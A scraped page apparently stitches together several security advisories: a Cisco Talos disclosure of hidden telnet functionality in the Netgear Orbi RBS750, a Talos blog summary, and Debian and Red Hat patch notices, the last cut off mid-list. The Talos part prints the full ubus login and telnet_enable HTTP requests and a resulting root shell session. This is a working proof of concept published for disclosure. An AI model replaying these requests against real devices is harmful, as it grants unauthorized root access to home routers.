Missing MAC layer security in Silicon Labs Wi-SUN Linux Border Router v1.5.2 and earlier allows malicious node to route malicious messages through network.

top.location='https://community.silabs.com/ex/errorduringprocessing.jsp'

CVE-2023-1262

A command execution vulnerability exists in the ubus backend communications functionality of Netgear Orbi Satellite RBS750 4.6.8.5. A specially-crafted JSON object can lead to arbitrary command execution. An attacker can send a sequence of malicious packets to trigger this vulnerability.

**SUMMARY**

A command execution vulnerability exists in the ubus backend communications functionality of Netgear Orbi Satellite RBS750 4.6.8.5. A specially-crafted JSON object can lead to arbitrary command execution. An attacker can send a sequence of malicious packets to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Netgear Orbi Satellite RBS750 4.6.8.5

**PRODUCT URLS**

Orbi Satellite RBS750 - https://www.netgear.com/support/product/RBS750

**CVSSv3 SCORE**

7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-912 - Hidden Functionality

**DETAILS**

The Orbi Mesh Wi-Fi System creates dedicated high-speed Wi-Fi connections to your Internet service. The Orbi router (model RBR750) connects to your modem or gateway. The Orbi satellite (model RBS750) extends the Wi-Fi signal throughout your home.

Interprocess communications between the router and satellite are often handled using the OpenWRT ubus library. While this is normal, there is a hidden functionality built into the satellite device that allows an attacker with knowlege of the web GUI password (or knowledge of the default password if this was unchanged), to enable and subsequently log into a hidden telnet service.

The initial step in triggering this vulnerability is to get a session using the SHA256 sum of the password with the username ‘admin’:

    POST /ubus HTTP/1.1
    Host: 10.0.0.4
    Content-Length: 217
    Accept: application/json
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.61 Safari/537.36
    Content-Type: application/json
    Origin: http://10.0.0.4
    Referer: http://10.0.0.4/
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Connection: close
    
    {"method":"call","params":["00000000000000000000000000000000","session","login",{"username":"admin","password":"<SHA256 hash of password>","timeout":900}],"jsonrpc":"2.0","id":3}
    

This will return a ‘ubus\_rpc\_session’ token needed to start the hidden telnet service:

    HTTP/1.1 200 OK
    Content-Type: application/json
    Content-Length: 829
    Connection: close
    Date: Mon, 11 Jul 2022 19:27:03 GMT
    Server: lighttpd/1.4.45
    
    {"jsonrpc":"2.0","id":3,"result":[0,{"ubus_rpc_session":"e6c28cc8358cb9182daa29e01782df67","timeout":900,"expires":899,"acls":{"access-group":{"netgear":["read","write"],"unauthenticated":["read"]},"ubus":{"netgear.get":["pot_details","satellite_status","connected_device","get_language"],"netgear.log":["ntgrlog_status","log_boot_status","telnet_status","packet_capture_status","firmware_version","hop_count","cpu_load","ntgrlog_start","ntgrlog_stop","log_boot_enable","log_boot_disable","telnet_enable","telnet_disable","packet_capture_start","packet_capture_stop"],"netgear.set":["set_language"],"netgear.upgrade":["upgrade_status","upgrade_version","upgrade_start"],"session":["access","destroy","get","login"],"system":["info"],"uci":["*"]},"webui-io":{"download":["read"],"upload":["write"]}},"data":{"username":"admin"}}]}
    

Once this token is retrieved we simply need to add a parameter called ‘telnet\_enable’ to start the service:

    POST /ubus HTTP/1.1
    Host: 10.0.0.4
    Content-Length: 138
    Accept: application/json
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.61 Safari/537.36
    Content-Type: application/json
    Origin: http://10.0.0.4
    Referer: http://10.0.0.4/status.html
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Connection: close
    
    {"method":"call","params":["e6c28cc8358cb9182daa29e01782df67","netgear.log","telnet_enable","log_boot_enable",{}],"jsonrpc":"2.0","id":13}
    

**Exploit Proof of Concept**

Using the same password used earlier to generate the SHA256 hash with the username ‘admin’ will allow an attacker to log into the service:

    $ telnet 10.0.0.4
    Trying 10.0.0.4...
    Connected to 10.0.0.4.
    Escape character is '^]'.
    
    login: admin
    Password: === IMPORTANT ============================
     Use 'passwd' to set your login password
     this will disable telnet and enable SSH
    ------------------------------------------
    
    
    BusyBox v1.30.1 () built-in shell (ash)
    
         MM           NM                    MMMMMMM          M       M
       $MMMMM        MMMMM                MMMMMMMMMMM      MMM     MMM
      MMMMMMMM     MM MMMMM.              MMMMM:MMMMMM:   MMMM   MMMMM
    MMMM= MMMMMM  MMM   MMMM       MMMMM   MMMM  MMMMMM   MMMM  MMMMM'
    MMMM=  MMMMM MMMM    MM       MMMMM    MMMM    MMMM   MMMMNMMMMM
    MMMM=   MMMM  MMMMM          MMMMM     MMMM    MMMM   MMMMMMMM
    MMMM=   MMMM   MMMMMM       MMMMM      MMMM    MMMM   MMMMMMMMM
    MMMM=   MMMM     MMMMM,    NMMMMMMMM   MMMM    MMMM   MMMMMMMMMMM
    MMMM=   MMMM      MMMMMM   MMMMMMMM    MMMM    MMMM   MMMM  MMMMMM
    MMMM=   MMMM   MM    MMMM    MMMM      MMMM    MMMM   MMMM    MMMM
    MMMM$ ,MMMMM  MMMMM  MMMM    MMM       MMMM   MMMMM   MMMM    MMMM
      MMMMMMM:      MMMMMMM     M         MMMMMMMMMMMM  MMMMMMM MMMMMMM
        MMMMMM       MMMMN     M           MMMMMMMMM      MMMM    MMMM
         MMMM          M                    MMMMMMM        M       M
           M
     ---------------------------------------------------------------
       For those about to rock... (Chaos Calmer, rtm-4.6.8.5+r49254)
     ---------------------------------------------------------------
    root@RBS750:/# 
    

**TIMELINE**

2022-08-30 - Initial Vendor Contact  
2022-09-05 - Vendor Disclosure  
2023-01-19 - Vendor Patch Release  
2023-03-21 - Public Release

Discovered by Dave McDaniel of Cisco Talos.

CVE-2022-36429: TALOS-2022-1597 || Cisco Talos Intelligence Group

Cisco Talos recently discovered four vulnerabilities in the Netgear Orbi mesh wireless system, including the main hub router and satellite routers that extend the network’s range.

Tuesday, March 21, 2023 13:03

_Christopher McBee and Dave McDaniel of Cisco Talos discovered these vulnerabilities._

Cisco Talos recently discovered four vulnerabilities in the Netgear Orbi mesh wireless system, including the main hub router and satellite routers that extend the network’s range.

A mesh system allows users to set up multiple access points to the Wi-Fi in their homes using various access points. Netgear’s Orbi system connects to the user’s modem or gateway and uses “satellites” to extend the Wi-Fi signal to different places throughout the home.

Talos discovered a vulnerability in the Orbi Satellite — TALOS-2022-1596 (CVE-2022-37337) — that could lead to arbitrary command execution on the device. The user needs to authenticate into the mesh system first, meaning they’d need to access an unprotected network or the login credentials of a password-protected network, for this attack to be successful. Then, the adversary needs to send a specially crafted HTTP request to trigger the vulnerability.

Two other issues, TALOS-2022-1595 (CVE-2022-38452) and TALOS-2022-1597 (CVE-2022-36429), exist in the main Orbi router that could also lead to arbitrary command execution if the adversary sends a specially crafted network request or JSON object, respectively.

TALOS-2022-1598 (CVE-2022-38458) also exists in the router. In this case, though, an adversary can carry out a man-in-the-middle attack to trick the service’s Web Services Management tool into disclosing sensitive information.

Cisco Talos worked with Netgear to ensure that TALOS-2022-1596, TALOS-2022-1597 and TALOS-2022-1598 are resolved and an update is available for affected customers. However, the company is still developing a patch for TALOS-2022-1595, though we are disclosing this vulnerability according to our 90-day timeline outlined in Cisco’s vulnerability disclosure policy.

Users are encouraged to update these affected products as soon as possible: Netgear Orbi Satellite RBS750, version 4.6.8.5. Talos tested and confirmed these versions of the Orbi system could be exploited by these vulnerabilities.

The following Snort rules will detect exploitation attempts against this vulnerability: 60474 – 60477 and 60499. Additional rules may be released in the future and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your Cisco Secure Firewall Management Center or Snort.org.

Vulnerability Spotlight: Netgear Orbi router vulnerable to arbitrary command execution

Debian Linux Security Advisory 5376-1 - Multiple vulnerabilities have been discovered in the Apache HTTP server, which may result in HTTP response splitting or denial of service.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5376-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffMarch 20, 2023                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : apache2CVE ID         : CVE-2006-20001 CVE-2022-36760 CVE-2022-37436 CVE-2023-25690                 CVE-2023-27522Multiple vulnerabilities have been discovered in the Apache HTTP server,which may result in HTTP response splitting or denial of service.For the stable distribution (bullseye), these problems have been fixed inversion 2.4.56-1~deb11u1.We recommend that you upgrade your apache2 packages.For the detailed security status of apache2 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/apache2Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmQYqdQACgkQEMKTtsN8TjYWeQ//dwKUtLc9oKmjEmiY1QsRsSYdlzMTWA8ow63vdtGD1QU3Xb/CxPSZ22Oh8zypNP5qtk3m11JA7npd7RNPpF3Gb1V5ebIlKP7GavGBIrGOmvH31hV3IUP4HoXO/mC36BA3twAgyF12HMtdPvj+qaNguYnxXhc02Kt7kl6sq+ybtdCnRnBfJJ2KYXKqtjRedc+HJZa0gSuq9fsFbaQF1OPk1jHEO/ixHhISKhEr1mHO+eLN3soQ9gqaEG/a/0jLUm1ThiBNeK5jkmCXuIuqwwrGHG16Cl9fIKGps1Yb+ef2aJca7onA4IfyUj1d1S7VmCgFFQe+5eAgdcR77mWS8RyEP/lyItY+ifzGG6xR0EUnDgD7ApcqhZBIJCgU583Dle+sjvwgb9iSSeNwynqx58Pf4648AJSx6nNlsop4ekE4To5GvKyr/eI3HNqat9BfVtwqRu4GnnurvJFzh5n2wpRl1JbQMFMx/kxb1He5ioayRtru9guViNA3ylgnd7lbk8FEsvvzS9MM0RVivlWdzD6+FVFHaWoCcwzv+0dFD6iiG5MJMGUr0pElw+juAs6bnKCCoEHU4HK0rKHlVeB6E3Ch7yF+b6PvzZqCqcOE6RB5/I2Nu9S3L78cZWRUnKXf/WHf3Lw+DCB8QKWUBuo0WjkFjmEe/oUCWHGt/UbtXGbSM+E=Bi/w-----END PGP SIGNATURE-----

Debian Security Advisory 5376-1

Red Hat Security Advisory 2023-1337-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 102.9.0 ESR.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2023:1337-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1337  
Issue date:        2023-03-20  
CVE Names:         CVE-2023-25751 CVE-2023-25752 CVE-2023-28162  
                   CVE-2023-28164 CVE-2023-28176  
====================================================================  
1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 102.9.0 ESR.

Security Fix(es):

* Mozilla: Incorrect code generation during JIT compilation  
(CVE-2023-25751)

* Mozilla: Memory safety bugs fixed in Firefox 111 and Firefox ESR 102.9  
(CVE-2023-28176)

* Mozilla: Potential out-of-bounds when accessing throttled streams  
(CVE-2023-25752)

* Mozilla: Invalid downcast in Worklets (CVE-2023-28162)

* Mozilla: URL being dragged from a removed cross-origin iframe into the  
same tab triggered navigation (CVE-2023-28164)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2178458 - CVE-2023-25751 Mozilla: Incorrect code generation during JIT compilation  
2178460 - CVE-2023-25752 Mozilla: Potential out-of-bounds when accessing throttled streams  
2178466 - CVE-2023-28162 Mozilla: Invalid downcast in Worklets  
2178470 - CVE-2023-28164 Mozilla: URL being dragged from a removed cross-origin iframe into the same tab triggered navigation  
2178472 - CVE-2023-28176 Mozilla: Memory safety bugs fixed in Firefox 111 and Firefox ESR 102.9

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
firefox-102.9.0-3.el9_1.src.rpm

aarch64:  
firefox-102.9.0-3.el9_1.aarch64.rpm  
firefox-debuginfo-102.9.0-3.el9_1.aarch64.rpm  
firefox-debugsource-102.9.0-3.el9_1.aarch64.rpm  
firefox-x11-102.9.0-3.el9_1.aarch64.rpm

ppc64le:  
firefox-102.9.0-3.el9_1.ppc64le.rpm  
firefox-debuginfo-102.9.0-3.el9_1.ppc64le.rpm  
firefox-debugsource-102.9.0-3.el9_1.ppc64le.rpm  
firefox-x11-102.9.0-3.el9_1.ppc64le.rpm

s390x:  
firefox-102.9.0-3.el9_1.s390x.rpm  
firefox-debuginfo-102.9.0-3.el9_1.s390x.rpm  
firefox-debugsource-102.9.0-3.el9_1.s390x.rpm  
firefox-x11-102.9.0-3.el9_1.s390x.rpm

x86_64:  
firefox-102.9.0-3.el9_1.x86_64.rpm  
firefox-debuginfo-102.9.0-3.el9_1.x86_64.rpm  
firefox-debugsource-102.9.0-3.el9_1.x86_64.rpm  
firefox-x11-102.9.0-3.el9_1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-25751  
https://access.redhat.com/security/cve/CVE-2023-25752  
https://access.redhat.com/security/cve/CVE-2023-28162  
https://access.redhat.com/security/cve/CVE-2023-28164  
https://access.redhat.com/security/cve/CVE-2023-28176  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZBh4dtzjgjWX9erEAQiCLA/9EQIrsyYlouTIW0DsRrnx+P4mS8u7qXCm  
6blO6pgZSm2hzqqEw8+M8mGlq6oGrYdd9GhT2qOYr0V/y4qxHeI6mk+ebCrL3Jq1  
YlTTfd/mLR38y2n+dEXIghNSCQ2pK4oeZ9XEbQ/U05Atrd/v1YP3YBQavF3tpbxb  
yH4EXqiQfWlyHpEpIrpsG39kKtV6kN+vgm2uA0bwMgfe+bq7yIJLVWlMRwhU+414  
s8CpsXQksSgRQLJtrDdMZ/IIYgtfeb6VAful3XFCVDBmVQskuDVNhviJSoJg4tp9  
AXXdgF/dMbXn7F73j/Rvn0GVXaurryXI6GeHNVrJ1lU0KhRyp8nZbSlTz+Px6le0  
FJrEuks8//YWtR1rHTd7J2Ytef+oE0xj65WLF7sULwIgV4aDjykOUP09WQ4pmjUf  
QsWBPwfpYdTQCuT4qaA63ZXzOn1NJZs9IyUckaMxhZ8m0NI+m1a3O5zfE7xRiAN1  
/dp/Rbt6LVwc3SFxQl8QZ1ebqeg5I5fZKgLKL7w6+MWu6bgif3zd7/HqumH+CJv6  
cgMbG6ZpTOW/cXcXXJzQ18kKhlG5JZajTT3KobY5QSi//553bFD4LRfFuskRRBFK  
Ol2kQy/fzpeUfTCIolh6VJCjrZ07eiDXEIn4hETmUc/Lto3owz9vnYCaGZFKM1Rm  
VZtQOLxSsOk=GR6W  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1337-01

Red Hat Security Advisory 2023-1332-01 - Network Security Services is a set of libraries designed to support the cross-platform development of security-enabled client and server applications.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: nss security update  
Advisory ID:       RHSA-2023:1332-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1332  
Issue date:        2023-03-20  
CVE Names:         CVE-2023-0767  
====================================================================  
1. Summary:

An update for nss is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - x86_64  
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64  
Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64  
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64  
Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Workstation (v. 7) - x86_64  
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64

3. Description:

Network Security Services (NSS) is a set of libraries designed to support  
the cross-platform development of security-enabled client and server  
applications.

Security Fix(es):

* nss: Arbitrary memory write via PKCS 12 (CVE-2023-0767)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing this update, applications using NSS (for example, Firefox)  
must be restarted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2170377 - CVE-2023-0767 nss: Arbitrary memory write via PKCS 12

6. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source:  
nss-3.79.0-5.el7_9.src.rpm

x86_64:  
nss-3.79.0-5.el7_9.i686.rpm  
nss-3.79.0-5.el7_9.x86_64.rpm  
nss-debuginfo-3.79.0-5.el7_9.i686.rpm  
nss-debuginfo-3.79.0-5.el7_9.x86_64.rpm  
nss-sysinit-3.79.0-5.el7_9.x86_64.rpm  
nss-tools-3.79.0-5.el7_9.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

x86_64:  
nss-debuginfo-3.79.0-5.el7_9.i686.rpm  
nss-debuginfo-3.79.0-5.el7_9.x86_64.rpm  
nss-devel-3.79.0-5.el7_9.i686.rpm  
nss-devel-3.79.0-5.el7_9.x86_64.rpm  
nss-pkcs11-devel-3.79.0-5.el7_9.i686.rpm  
nss-pkcs11-devel-3.79.0-5.el7_9.x86_64.rpm

Red Hat Enterprise Linux ComputeNode (v. 7):

Source:  
nss-3.79.0-5.el7_9.src.rpm

x86_64:  
nss-3.79.0-5.el7_9.i686.rpm  
nss-3.79.0-5.el7_9.x86_64.rpm  
nss-debuginfo-3.79.0-5.el7_9.i686.rpm  
nss-debuginfo-3.79.0-5.el7_9.x86_64.rpm  
nss-sysinit-3.79.0-5.el7_9.x86_64.rpm  
nss-tools-3.79.0-5.el7_9.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

x86_64:  
nss-debuginfo-3.79.0-5.el7_9.i686.rpm  
nss-debuginfo-3.79.0-5.el7_9.x86_64.rpm  
nss-devel-3.79.0-5.el7_9.i686.rpm  
nss-devel-3.79.0-5.el7_9.x86_64.rpm  
nss-pkcs11-devel-3.79.0-5.el7_9.i686.rpm  
nss-pkcs11-devel-3.79.0-5.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:  
nss-3.79.0-5.el7_9.src.rpm

ppc64:  
nss-3.79.0-5.el7_9.ppc.rpm  
nss-3.79.0-5.el7_9.ppc64.rpm  
nss-debuginfo-3.79.0-5.el7_9.ppc.rpm  
nss-debuginfo-3.79.0-5.el7_9.ppc64.rpm  
nss-devel-3.79.0-5.el7_9.ppc.rpm  
nss-devel-3.79.0-5.el7_9.ppc64.rpm  
nss-sysinit-3.79.0-5.el7_9.ppc64.rpm  
nss-tools-3.79.0-5.el7_9.ppc64.rpm

ppc64le:  
nss-3.79.0-5.el7_9.ppc64le.rpm  
nss-debuginfo-3.79.0-5.el7_9.ppc64le.rpm  
nss-devel-3.79.0-5.el7_9.ppc64le.rpm  
nss-sysinit-3.79.0-5.el7_9.ppc64le.rpm  
nss-tools-3.79.0-5.el7_9.ppc64le.rpm

s390x:  
nss-3.79.0-5.el7_9.s390.rpm  
nss-3.79.0-5.el7_9.s390x.rpm  
nss-debuginfo-3.79.0-5.el7_9.s390.rpm  
nss-debuginfo-3.79.0-5.el7_9.s390x.rpm  
nss-devel-3.79.0-5.el7_9.s390.rpm  
nss-devel-3.79.0-5.el7_9.s390x.rpm  
nss-sysinit-3.79.0-5.el7_9.s390x.rpm  
nss-tools-3.79.0-5.el7_9.s390x.rpm

x86_64:  
nss-3.79.0-5.el7_9.i686.rpm  
nss-3.79.0-5.el7_9.x86_64.rpm  
nss-debuginfo-3.79.0-5.el7_9.i686.rpm  
nss-debuginfo-3.79.0-5.el7_9.x86_64.rpm  
nss-devel-3.79.0-5.el7_9.i686.rpm  
nss-devel-3.79.0-5.el7_9.x86_64.rpm  
nss-sysinit-3.79.0-5.el7_9.x86_64.rpm  
nss-tools-3.79.0-5.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

ppc64:  
nss-debuginfo-3.79.0-5.el7_9.ppc.rpm  
nss-debuginfo-3.79.0-5.el7_9.ppc64.rpm  
nss-pkcs11-devel-3.79.0-5.el7_9.ppc.rpm  
nss-pkcs11-devel-3.79.0-5.el7_9.ppc64.rpm

ppc64le:  
nss-debuginfo-3.79.0-5.el7_9.ppc64le.rpm  
nss-pkcs11-devel-3.79.0-5.el7_9.ppc64le.rpm

s390x:  
nss-debuginfo-3.79.0-5.el7_9.s390.rpm  
nss-debuginfo-3.79.0-5.el7_9.s390x.rpm  
nss-pkcs11-devel-3.79.0-5.el7_9.s390.rpm  
nss-pkcs11-devel-3.79.0-5.el7_9.s390x.rpm

x86_64:  
nss-debuginfo-3.79.0-5.el7_9.i686.rpm  
nss-debuginfo-3.79.0-5.el7_9.x86_64.rpm  
nss-pkcs11-devel-3.79.0-5.el7_9.i686.rpm  
nss-pkcs11-devel-3.79.0-5.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:  
nss-3.79.0-5.el7_9.src.rpm

x86_64:  
nss-3.79.0-5.el7_9.i686.rpm  
nss-3.79.0-5.el7_9.x86_64.rpm  
nss-debuginfo-3.79.0-5.el7_9.i686.rpm  
nss-debuginfo-3.79.0-5.el7_9.x86_64.rpm  
nss-devel-3.79.0-5.el7_9.i686.rpm  
nss-devel-3.79.0-5.el7_9.x86_64.rpm  
nss-sysinit-3.79.0-5.el7_9.x86_64.rpm  
nss-tools-3.79.0-5.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

x86_64:  
nss-debuginfo-3.79.0-5.el7_9.i686.rpm  
nss-debuginfo-3.79.0-5.el7_9.x86_64.rpm  
nss-pkcs11-devel-3.79.0-5.el7_9.i686.rpm  
nss-pkcs11-devel-3.79.0-5.el7_9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-0767  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZBh4d9zjgjWX9erEAQi0VA/9EDOjHMY594bv+AZ4cg4w1wAKFyh+3m+j  
jyOn0aHNkLFAXyHixGKeANhURkvQ6MG2CWVz/2idzPWvrVBMAmN26OXOJI7MmOve  
AZPPt+kK83ec+PAdNLRKDWlMXx/C7YxIDlMolC3vsHs8GFOh07sQSl+qCgCUsoqL  
wULhFZoxfjvMRM7PNsXYrjWhOQkbCZYudbp3sXhWXNcMFGttR2I51f0AVWvVl1P1  
JPwVBlEK0EphYWNncr2zQphP6zWLPyl0B0o+7O/M5a/bkXrAN13ShHv8N06Rmxry  
XFWJTk9DyPQljYK2dYJjo0N/9zDKouXwdTxuwoxPYhrFgsy+VKEFp47oFUlrzLB6  
x5pdDarqpdcOkPFNZuRjuBw2RbMozWkoy+JajW7NXFz3XYZky9B95RZSNI2lHhdQ  
cwqJ2aZSAgOJMexcxPxkiwkE4l2V82yYBEHgkf2/6/HZSoYCFZtYJKF5miPaMNYY  
nhbc2w6Z3aQ78C5jS9wqdVsJsCpVPflwRq8FXUO0bAB91VG/GvqAIdH/VhxAlXy5  
5h2g/skrFCTAR9iKE4AWm5uk1mPN/tTQa7eHY7fx/fA3cTm46Jd/5am0w8IhZHoq  
I1X6fJzE3WMg4AZ6y/BAiVSTxolLhepNy3zdCP8cpyK+aMDipPimw8rddTayiEaU  
1y2vLw5oCe4=ZIU4  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1332-01

Red Hat Security Advisory 2023-1333-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 102.9.0 ESR.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2023:1333-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1333  
Issue date:        2023-03-20  
CVE Names:         CVE-2023-25751 CVE-2023-25752 CVE-2023-28162  
                   CVE-2023-28164 CVE-2023-28176  
====================================================================  
1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - x86_64  
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64  
Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Server Optional (v. 7) - x86_64  
Red Hat Enterprise Linux Workstation (v. 7) - x86_64  
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 102.9.0 ESR.

Security Fix(es):

* Mozilla: Incorrect code generation during JIT compilation  
(CVE-2023-25751)

* Mozilla: Memory safety bugs fixed in Firefox 111 and Firefox ESR 102.9  
(CVE-2023-28176)

* Mozilla: Potential out-of-bounds when accessing throttled streams  
(CVE-2023-25752)

* Mozilla: Invalid downcast in Worklets (CVE-2023-28162)

* Mozilla: URL being dragged from a removed cross-origin iframe into the  
same tab triggered navigation (CVE-2023-28164)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2178458 - CVE-2023-25751 Mozilla: Incorrect code generation during JIT compilation  
2178460 - CVE-2023-25752 Mozilla: Potential out-of-bounds when accessing throttled streams  
2178466 - CVE-2023-28162 Mozilla: Invalid downcast in Worklets  
2178470 - CVE-2023-28164 Mozilla: URL being dragged from a removed cross-origin iframe into the same tab triggered navigation  
2178472 - CVE-2023-28176 Mozilla: Memory safety bugs fixed in Firefox 111 and Firefox ESR 102.9

6. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source:  
firefox-102.9.0-3.el7_9.src.rpm

x86_64:  
firefox-102.9.0-3.el7_9.x86_64.rpm  
firefox-debuginfo-102.9.0-3.el7_9.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

x86_64:  
firefox-102.9.0-3.el7_9.i686.rpm  
firefox-debuginfo-102.9.0-3.el7_9.i686.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:  
firefox-102.9.0-3.el7_9.src.rpm

ppc64:  
firefox-102.9.0-3.el7_9.ppc64.rpm  
firefox-debuginfo-102.9.0-3.el7_9.ppc64.rpm

ppc64le:  
firefox-102.9.0-3.el7_9.ppc64le.rpm  
firefox-debuginfo-102.9.0-3.el7_9.ppc64le.rpm

s390x:  
firefox-102.9.0-3.el7_9.s390x.rpm  
firefox-debuginfo-102.9.0-3.el7_9.s390x.rpm

x86_64:  
firefox-102.9.0-3.el7_9.x86_64.rpm  
firefox-debuginfo-102.9.0-3.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

x86_64:  
firefox-102.9.0-3.el7_9.i686.rpm  
firefox-debuginfo-102.9.0-3.el7_9.i686.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:  
firefox-102.9.0-3.el7_9.src.rpm

x86_64:  
firefox-102.9.0-3.el7_9.x86_64.rpm  
firefox-debuginfo-102.9.0-3.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

x86_64:  
firefox-102.9.0-3.el7_9.i686.rpm  
firefox-debuginfo-102.9.0-3.el7_9.i686.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-25751  
https://access.redhat.com/security/cve/CVE-2023-25752  
